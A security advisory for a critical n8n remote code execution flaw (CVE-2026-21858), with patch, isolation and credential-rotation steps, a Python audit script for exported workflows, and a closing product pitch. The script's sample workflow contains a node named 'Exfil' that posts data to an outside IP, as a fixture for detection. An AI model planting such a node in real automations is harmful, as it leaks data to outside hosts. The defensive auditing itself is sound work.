Critical Advisory: n8n RCE Vulnerability (CVE-2026-21858) Exposes Automation Pipelines

A critical RCE (CVSS 10.0) in n8n exposes automation pipelines and stored secrets to full compromise—upgrade to version 1.36.1 immediately.

Urgent: Unpatched n8n instances are open doors to your entire tech stack.


TL;DR

  • Threat: A critical RCE flaw (CVSS 10.0) in n8n lets attackers execute code on the host running it.
  • Risk: n8n typically holds API keys for AWS, Stripe, Slack and Salesforce and acts as the hub for automated activity; compromising it can enable lateral movement throughout your environment.
  • Solution: Upgrade to v1.36.1 immediately. If you cannot apply the patch, take the instance offline or fully isolate it behind a WAF/VPN.

The “Keys to the Kingdom” Vulnerability

For many DevOps and IT teams, n8n is the invisible engine that runs the business—automating everything from customer onboarding to infrastructure provisioning. Because of this role, n8n instances are often trusted with highly sensitive credentials: database passwords, cloud provider API keys, and OAuth tokens.

This is why CVE-2026-21858 is a nightmare scenario.

This critical RCE flaw allows an attacker to bypass authentication safeguards, execute arbitrary code, and manipulate workflows. Once inside, they don't just compromise the n8n server; they gain access to every service that n8n is connected to.

This isn't just an application vulnerability; it is a supply chain bridge into your private data.

Technical Breakdown

  • Primary Vulnerability: CVE-2026-21858
  • Severity: Critical (CVSS v3.1: 10.0)
  • Vector: Remote Code Execution (RCE) via unauthenticated or low-privilege vectors (depending on configuration).
  • Affected Versions: n8n versions ≤ 1.36.0
  • Fixed Version: n8n version 1.36.1

Secondary Vulnerabilities Identified:

Alongside the primary RCE, three high-severity vulnerabilities were also disclosed:

  • CVE-2025-68613 (High): Authentication bypass risks.
  • CVE-2025-68668 (High): Privilege escalation vectors.
  • CVE-2026-21877 (High): Workflow manipulation flaws.

The Impact: Why This Matters

If exploited, an attacker can:

  1. Execute System Commands: Gain full shell access to the host OS running n8n.
  2. Steal Secrets: Exfiltrate the encrypted credentials stored within n8n workflows (AWS keys, database strings, SaaS tokens).
  3. Weaponize Workflows: Modify existing automations to redirect sensitive data (e.g., sending customer leads to a malicious server) or deploy malware to connected downstream systems.
  4. Lateral Movement: Use the n8n host as a pivot point to attack internal networks that are otherwise reachable only via the trusted automation server.

Immediate Remediation Plan

Your security team should treat this as a live incident, not a drill.

1. Patch Immediately

Update your n8n Docker containers or npm packages to v1.36.1 or later immediately.

Note: Verify the integrity of your database backups before applying the update.

2. Isolate & Restrict

If you cannot upgrade immediately:

  • Take it offline: If the instance is public-facing, restrict access to a VPN or internal IP range immediately.
  • WAF Rules: Block all external webhooks unless absolutely necessary and verify the source IPs.

3. Rotate Credentials (Critical)

If your instance was exposed to the internet and unpatched, assume your stored credentials are compromised.

  • Rotate API keys for all services connected to n8n (Slack, GitHub, Google Drive, AWS, etc.).
  • Revoke and reissue OAuth tokens used in your workflows.

4. Audit Execution Logs

Review n8n execution logs for workflows you do not recognize, or legitimate workflows that have been modified to include "HTTP Request" nodes sending data to unknown external IPs.
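An added audit helper to support steps 1 and 4 above (written for this page, not code from the advisory or the n8n project): it checks a version string against the advisory's affected range and walks an exported workflow JSON for "HTTP Request" nodes that point outside an assumed allowlist or build their destination at run time. The sample workflow and the allowlisted hosts are constructed.

```python
import json
from urllib.parse import urlparse

# Constructed sample: a minimal n8n workflow export with one legitimate
# HTTP Request node, one pointing at an unknown external IP, and one
# whose URL is an n8n expression (resolved only when the workflow runs).
SAMPLE_WORKFLOW = json.loads("""
{
  "name": "Lead sync",
  "nodes": [
    {"name": "Webhook", "type": "n8n-nodes-base.webhook", "parameters": {"path": "leads"}},
    {"name": "CRM upsert", "type": "n8n-nodes-base.httpRequest",
     "parameters": {"url": "https://api.example-crm.com/v1/leads", "method": "POST"}},
    {"name": "Exfil", "type": "n8n-nodes-base.httpRequest",
     "parameters": {"url": "http://203.0.113.45:8080/collect", "method": "POST"}},
    {"name": "Expr", "type": "n8n-nodes-base.httpRequest",
     "parameters": {"url": "={{ $json.target }}", "method": "POST"}}
  ]
}
""")

# Assumed allowlist: hosts your workflows are expected to talk to.
ALLOWED_HOSTS = {"api.example-crm.com", "hooks.slack.com"}


def audit_http_request_nodes(workflow, allowed_hosts):
    """Return (node_name, url, reason) for each HTTP Request node whose
    destination is outside the allowlist or is decided at run time."""
    findings = []
    for node in workflow.get("nodes", []):
        if node.get("type") != "n8n-nodes-base.httpRequest":
            continue
        url = str(node.get("parameters", {}).get("url", ""))
        if url.startswith("="):
            # n8n expressions start with "="; the real target is not visible here.
            findings.append((node["name"], url, "dynamic url expression"))
            continue
        host = urlparse(url).hostname or ""
        if host not in allowed_hosts:
            findings.append((node["name"], url, f"host {host!r} not allowlisted"))
    return findings


def is_vulnerable_version(version):
    """True when an n8n version string falls in the advisory's range (<= 1.36.0)."""
    numeric = version.lstrip("v").split("-")[0]  # drop a pre-release suffix
    parts = tuple(int(p) for p in numeric.split(".")[:3])
    return parts <= (1, 36, 0)


if __name__ == "__main__":
    for name, url, reason in audit_http_request_nodes(SAMPLE_WORKFLOW, ALLOWED_HOSTS):
        print(f"[REVIEW] node {name!r} -> {url}: {reason}")
```

Point the audit at each workflow exported from the instance and review every flagged node against its change history.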


The Secure.com Perspective

This n8n advisory highlights the dangerous gap in the "Shift-Left" philosophy. You can scan your code all you want, but if a third-party tool you rely on for operations (like n8n) introduces a runtime RCE, your static checks won't save you.

This is the Headcount Gap Crisis in action - security teams lack the capacity to respond to every critical vulnerability at the speed threats demand. Security teams are drowning in thousands of low-fidelity alerts, while a critical infrastructure flaw like this requires immediate, high-context attention.


How a Digital Security Teammate Helps

Instead of waiting for a human analyst to read this blog post, Secure.com's Digital Security Teammate would have already:

  • Mapped the Asset: Identified all running n8n instances in your cloud environment via the unified data fabric.
  • Matched the Threat: Correlated CVE-2026-21858 against your specific version numbers.
  • Contextualized the Risk: Flagged the instance as "Critical" not just because of the CVSS score, but because it detected high-value IAM roles attached to that workload.
  • Drafted the Remediation: Created a ticket with the upgrade command and a list of credentials that need rotation, then waited for human approval before execution, maintaining the human-in-the-loop control that security leaders require.